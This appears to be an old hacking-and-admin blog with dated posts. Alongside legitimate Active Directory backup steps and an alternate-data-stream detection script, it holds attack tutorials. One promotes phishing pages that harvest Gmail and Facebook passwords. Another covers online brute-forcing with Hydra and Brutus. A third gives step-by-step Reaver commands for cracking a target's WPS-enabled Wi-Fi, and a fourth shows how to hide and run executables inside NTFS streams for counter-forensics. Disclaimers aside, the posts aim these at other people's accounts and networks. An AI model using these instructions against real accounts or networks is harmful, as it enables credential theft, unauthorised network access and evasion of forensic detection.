
Saturday 18 May 2013

Password Attack using Social Engineering Toolkit

Continuing my last post about password attacks.. Have you tried my previously discussed tricks???
Whatever, I will discuss other password recovery methods.
Rather than attacking directly, you can also try these two methods.
1) Phishing:- This method is used to create a fake login page of a popular website such as
Gmail, Yahoo, Facebook & Orkut etc. So whenever any user enters a username & password, it is
sent to your pre-defined e-mail id. Using it you can easily hack a Gmail or Facebook password.
Though I always ask you to keep the word "Ethical" in mind. So be a good chap. Try it for fun and educational purposes. Designing an absolute duplicate copy of those pages is really tough.
But don't worry, with the right tool this is a piece of cake. The best one I used a lot during my training demonstrations is SET (Social Engineering Toolkit). Trust me, with a little looking around you can do the phishing attack
in a few simple steps.

You need
1. An internet connection
2. SET (built into many penetration testing distributions such as Backtrack)
3. A little creativity to trap your target (there are lots of methods you can use as per your scenario)
4. Being familiar with the Backtrack live CD & Metasploit Framework can be a great advantage

Currently I am giving you a great link to learn how to use it.
Step by Step Guide to SET


Besides phishing, SET has a lot of features:-

a) Hack a remote computer
b) Create malicious USB media that, when run on the victim's PC, gives automatic access to it
c) Run a web server hosting an exploit to hack a PC

Let me know if any further guide is needed.

Friday 17 May 2013

Active Directory Backup



Active Directory Backup & Restoration in Server 2008


Before going through this, install the Windows Server Backup feature from Server Manager.
1. Open up your command prompt by clicking Start and type “cmd” and hit enter.
2. In your command prompt type 
wbadmin start systemstatebackup -backuptarget:e: 
and press enter.
Note: You can use a different backup target of your choosing
3. Type “y” and press enter to start the backup process.

When the backup is finished running you should get a message that the backup completed successfully. If it did not complete properly you will need to troubleshoot.

Now you have a system state backup of your 2008 Server!
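An added PowerShell wrapper for the backup above (example code, not from the original post): it runs the same wbadmin system state backup non-interactively and records the version identifier that the restore section tells you to write down. It assumes an elevated prompt on the DC, the Windows Server Backup feature installed, E: as the backup target, and a hypothetical log path.

```powershell
# Added example, not part of the original post. Runs the same system state
# backup as step 2 without the interactive "y" prompt, then records the newest
# version identifier so the restore section's
# "wbadmin start systemstaterecovery -version:<id>" can be run from the log.
# Assumptions: elevated prompt on the DC, Windows Server Backup installed,
# E: as the target; $LogPath is a hypothetical location.
function Invoke-SystemStateBackup {
    param(
        [string]$BackupTarget = 'E:',
        [string]$LogPath = 'C:\adbackup\last-version.txt'
    )

    # -quiet suppresses the confirmation; a non-zero exit code means the backup
    # did not complete and must be troubleshot before it is trusted.
    & wbadmin start systemstatebackup "-backuptarget:$BackupTarget" -quiet
    if ($LASTEXITCODE -ne 0) {
        throw "wbadmin exited with code $LASTEXITCODE; the system state backup did not complete."
    }

    # "wbadmin get versions" lists backups oldest first, with one
    # "Version identifier: MM/dd/yyyy-HH:mm" line each; keep only those values.
    $versions = @(& wbadmin get versions "-backuptarget:$BackupTarget" |
        ForEach-Object { if ($_ -match '^Version identifier:\s*(\S+)') { $Matches[1] } })
    if ($versions.Count -eq 0) { throw "No backup versions found on $BackupTarget" }

    $latest = $versions[-1]
    New-Item -ItemType Directory -Force -Path (Split-Path -Parent $LogPath) | Out-Null
    "$(Get-Date -Format o) $latest" | Add-Content -Path $LogPath
    Write-Host "Backup complete. Restore with: wbadmin start systemstaterecovery -version:$latest"
    return $latest
}

Invoke-SystemStateBackup -BackupTarget 'E:'
```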
Authoritative Restore of Active Directory
So now what if you accidentally delete an OU, group, or a user account and it’s already replicated to your other servers? We will need to perform an authoritative restore of the Active Directory object you accidentally deleted.
1. To do this you will need to boot into DSRM (Directory Services Restore Mode) by restarting your server and pressing F8 during the restart.
2. Choose Directory Services Restore Mode from the Advanced Boot menu.

3. Login to your server with your DSRM password you created during Active Directory installation.
4. Once you’re logged into your server and in DSRM safe mode, open a command prompt by clicking Start, type “cmd“, and press enter.
5. To make sure you restore the correct backup it’s a good idea to use the “wbadmin get versions” command and write down the version you need to use.

6. Now we need to perform a non-authoritative restore of Active Directory by typing
wbadmin start systemstaterecovery -version:04/14/2009-02:39
Note: The version of the backup will vary depending on your situation. Type "y" and press enter to start the non-authoritative restore.
7. Go grab some coffee and take a break while the restore completes.

8. You can mark the sysvol as authoritative by adding the -authsysvol switch to the end of the wbadmin command.

9. But if you want to restore a specific Active Directory object then you can use the ever-familiar ntdsutil.
For this example we are going to restore a user account with a distinguished name of
"CN=Test User,CN=Users,DC=example,DC=com"
So the commands would be:
ntdsutil
activate instance ntds
authoritative restore
restore object "cn=Test User,cn=Users,dc=example,dc=com"
Note: The quotes are required

10. Reboot your server into normal mode and you’re finished. The object will be marked as authoritative and replicate to the rest of your domain.

Using Active Directory Snapshots
There is a really cool new feature in Windows Server 2008 called Active Directory Snapshots. Volume Shadow Copy Service now allows us to take a snapshot of Active Directory as a type of backup. They are very quick to create and serve as another line of defense for your backup strategy.
With your server booted into normal mode open a command prompt by clicking Start, type “cmd“, and press enter.
We are going to use the ntdsutil again for creating the Active Directory snapshots. The commands are:
ntdsutil
snapshot
activate instance ntds
create
quit
quit

So now that you have a snapshot of AD, how do you access the data? First we need to mount the snapshot using ntdsutil. The commands are:
ntdsutil
snapshot
list all
mount 1
(Note: You should mount the correct snapshot you need; for this example there is only 1.)
quit
quit

Your snapshot is mounted, but how do you access the data? We need to use the dsamain command to accomplish this. Then we need to select an LDAP port to use. The command is as follows:

dsamain -dbpath c:\$SNAP_200905141444_VOLUMEC$\WINDOWS\NTDS\ntds.dit -ldapport 10001
The result should look like this:

Now we need to go to Start, Administrative Tools, then Active Directory Users and Computers.
Right click Active Directory Users and Computers and select Change Domain Controller.

In the area that says < Type a Directory Server name [:port] here > enter the name of your server and the LDAP port you used when running the dsamain command.
For my example it would be: WIN-V22UWGW0LU8.HOME.LOCAL:10001

Now you can browse the snapshot of Active Directory without affecting anything else negatively.


Wednesday 15 May 2013

Step by step guide to password hacking

Password Hacking

Although password hacking or cracking is not the ultimate goal of an
expert hacker, it is very important from a security standpoint. If you are a newbie who just searched Google for password hacking & dropped into this blog, please note that you are not going to learn this in a second.
Before you start reading further, be sure you really know what a password is, and how & where they are used. Before we jump into the topic we need to streamline our task.
Password attacks can be divided into two types:
a) Online Password Attack
b) Offline Password Attack

Note: From now on keep the word "Ethical" in mind & use this knowledge to improve your security; don't try these
on a corporate network. If you get caught, I will not be there to save you. :)

Coming back to the topic, a password attack can be done using the below methods:
1) Bruteforce Method :- Trying randomly generated passwords & testing them against the server.
2) Dictionary Method :- In this method, all probable passwords are listed in a file, and each of them is tested against the server. It's faster, & having a good dictionary file can make the task really easy.
3) Rainbow Attack :- This method is newer and is basically used to crack hashed passwords. To know more about password hashes go back to Google or request an article here.
Now straight back into the business.
Online password attack:- Do the test in a test network or virtual PC, with simple passwords at the beginning.

I will discuss two interesting tools for online password attacks, Brutus & Hydra. The second one is my fav.
You can download them using the links below:
Brutus: Brutus is one of the fastest, most flexible remote password crackers you can get your hands on - it's also free. It is available for Windows 9x, NT and 2000, there is no UN*X version available. Brutus was first made publicly available in October 1998.
So it's very simple to launch the attack. Just type your target IP & select the service type & attack method.
Click on Start to launch the attack. If lucky, the password will be displayed in a few moments.
Try it on your local FTP server with a short password, which will make you believe this can work, & keep trying.

Hydra: Originally developed by THC. It's better because it can run on Unix platforms & supports a lot more protocols than its competitor. It's faster, and if you get familiar with the command line version, with a bit of effort you will surely fall in love with it. For those who hate commands, luckily a GUI version is also available. But a friendly reminder: if you really want to be a hacker, start loving the command line. Believe me, there is no other alternative. For help regarding it visit http://www.thc.org/thc-hydra/ for detailed documentation. If you find it difficult to understand, ask for a post here.
Will continue the topic in my next post. Till then, happy cracking.
Be a member for more interesting topics. Thank you for reading.
 

Monday 13 May 2013

WPA2 password hacking

How to Crack WPA2 password 802.11 Wifi

Note: This method works only with WPA routers which have WPS support. Most routers sold since 2008 are WPS enabled.
         This tutorial is for educational purposes only. I am not encouraging anyone to hack into other APs & make them pay a high internet bill.

Downloads & setup:

    I used Ubuntu but you can use any Linux distro. Root access is a must.
    libpcap:- Traffic capture library
    Reaver :- Hacking tool. Download Reaver-1.4
    Iwscanner:- Wifi scanning tool. Download link- Iwscanner 0.24 [Ubuntu]  Iwscanner-0.2.4 [Linux generic]

Step 1. Install Libpcap & Its dependencies:

    sudo apt-get update

    sudo apt-get install build-essential

    sudo apt-get install flex bison

    sudo apt-get install libpcap-dev

    sudo apt-get install libpcap3-dev

    sudo apt-get install libsqlite3-dev

    sudo apt-get install libnl2-dev

Step 2. How to Compile/Build Reaver:

Make sure you've got build-essential installed, then run the following commands (assuming reaver is extracted to the desktop):

    cd ~/Desktop/reaver-1.4/src

    ./configure

    make

    sudo make install


Step 3. Identify MAC address of the target router.

You can use any Wifi Scanner like iwScanner  to note the MAC address of the target Wifi SSID.


Step 4. Putting your Wireless card to monitor mode.

Run these commands on terminal:

    sudo ifconfig wlan0 down

    sudo iwconfig wlan0 mode monitor

    sudo ifconfig wlan0 up


Step 5. Starting the attack:

Reaver only requires two inputs to launch an attack: the interface to use to launch it, and the MAC address of the target:

    sudo reaver -i wlan0 -b 00:11:22:33:44:55  [replace this with the target MAC address]

Wait for a few hours (yes, patience is the key).

Step 6. When the attack finishes, it will give you the SSID and authentication password for the target network.

During the attack the target AP can stop responding, effectively causing a denial of service (DoS) against it.

Sunday 12 May 2013

God Mode in Windows 7 (Work in Vista & win8 too)

This hidden feature will conveniently put hundreds of settings from all over the OS into one place.

Step:

Create a new folder on your desktop and name it

GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}

270 items will automatically be added to the folder consisting of every configurable option in Windows 7.

Happy Computing Folks!!!

Friday 10 May 2013

Finding Alternate Data Stream

Finding Alternate Data Stream
We can use LADS to find out if any Alternate Data Stream is hidden in our system.
The syntax is pretty simple; adding /S also looks in subdirectories.

C:\>lads c:\
LADS - Freeware version 4.00

(C) Copyright 1998-2004 Frank Heyne Software (http://www.heysoft.de)
This program lists files with alternate data streams (ADS)
Use LADS on your own risk!
Scanning directory C:\

size ADS in file

---------- ---------------------------------
Error 32 opening C:\pagefile.sys
368146432 C:\sample.txt:pp.avi
18 C:\sample.txt:secret.txt
21 C:\data\:mean.txt
The following summary might be incorrect because there was at least one error!

368132511 bytes in 3 ADS listed



C:\>lads /?

LADS - Freeware version 4.00
(C) Copyright 1998-2004 Frank Heyne Software (http://www.heysoft.de)
This program lists files with alternate data streams (ADS)
Use LADS on your own risk!

Usage: LADS [Directory] [/S] [/D] [/A] [/Xname]
Directory: directory to scan, current if ommitted
/S include Subdirectories
/D Debug LADS ;-)
/V Verbose error reports
/A give a summary of All bytes used in the scanned directories
(All files and directories are considered as uncompressed
and all security decriptions are skipped
for calculating this number!)
/Xname eXclude any ADS "name"
/Pfile read Parameters from "file"

C:\> 

Download LADS from LADS DOWNLOAD

In Windows Vista & higher you can try the
DIR /R command for the same purpose.

Alternate Data Stream

ADS (Alternate Data Stream):- Windows has a weird feature in the NTFS file system which can be used for different purposes. It's up to you. Using this you can hide a file/folder inside another file so that no one else can see it; most amazingly, the file size will not increase. I am giving you an example to hide an exe inside a text file. Try it. Visit the Ethical Hacking section of my blog & request details if you want to know all the aspects of this feature & the counter-forensic technique.

Copy calc.exe from the windows\system32 folder to the C: drive.
Now create a text file (say sample.txt) in the C: drive.

Now run the following command:
C:\>type calc.exe>sample.txt:calc.exe
Delete calc.exe.
Now open sample.txt & check its size too. Then run

C:\>start .\sample.txt:calc.exe

Enjoy it... You can hide any file using it....
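An added PowerShell hunt (example code, not from the original posts) that covers both ADS posts above: it enumerates alternate data streams the way LADS and DIR /R do, and additionally flags streams holding a PE executable, which is exactly what "type calc.exe>sample.txt:calc.exe" leaves behind. It assumes Windows PowerShell 3.0 to 5.1 on an NTFS volume and a hypothetical root of C:\.

```powershell
# Added example, not from the original posts. Assumptions: Windows PowerShell
# 3.0-5.1 (PowerShell 7 replaced "-Encoding Byte" with "-AsByteStream"), an
# NTFS volume, and a hypothetical $Root of C:\ matching the "lads c:\" run above.
function Find-AlternateDataStream {
    param([string]$Root = 'C:\')

    # -Force includes hidden/system entries; unreadable ones (pagefile.sys) are
    # skipped instead of aborting, the same "Error 32" case LADS reports above.
    Get-ChildItem -LiteralPath $Root -Recurse -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            $item = $_
            # -Stream * returns the unnamed ':$DATA' stream plus every named stream,
            # on directories as well as files (compare "C:\data\:mean.txt" above).
            Get-Item -LiteralPath $item.FullName -Stream * -ErrorAction SilentlyContinue |
                Where-Object { $_.Stream -ne ':$DATA' -and $_.Stream -ne 'Zone.Identifier' } |
                ForEach-Object {
                    # Peek at the first two bytes: "MZ" means a PE executable was
                    # stashed in the stream, as in "type calc.exe>sample.txt:calc.exe".
                    $head = Get-Content -LiteralPath $item.FullName -Stream $_.Stream `
                        -Encoding Byte -TotalCount 2 -ErrorAction SilentlyContinue
                    $isPE = (@($head).Count -eq 2 -and $head[0] -eq 0x4D -and $head[1] -eq 0x5A)
                    [pscustomobject]@{
                        File    = $item.FullName
                        Stream  = $_.Stream
                        Bytes   = $_.Length
                        PEImage = $isPE
                    }
                }
        }
}

# Executables hidden in streams sort to the top; Zone.Identifier is excluded because
# every downloaded file legitimately carries that mark-of-the-web stream.
Find-AlternateDataStream -Root 'C:\' | Sort-Object PEImage -Descending | Format-Table -AutoSize
```

To clean up a finding, Remove-Item -LiteralPath C:\sample.txt -Stream calc.exe deletes just that stream and leaves the host file intact.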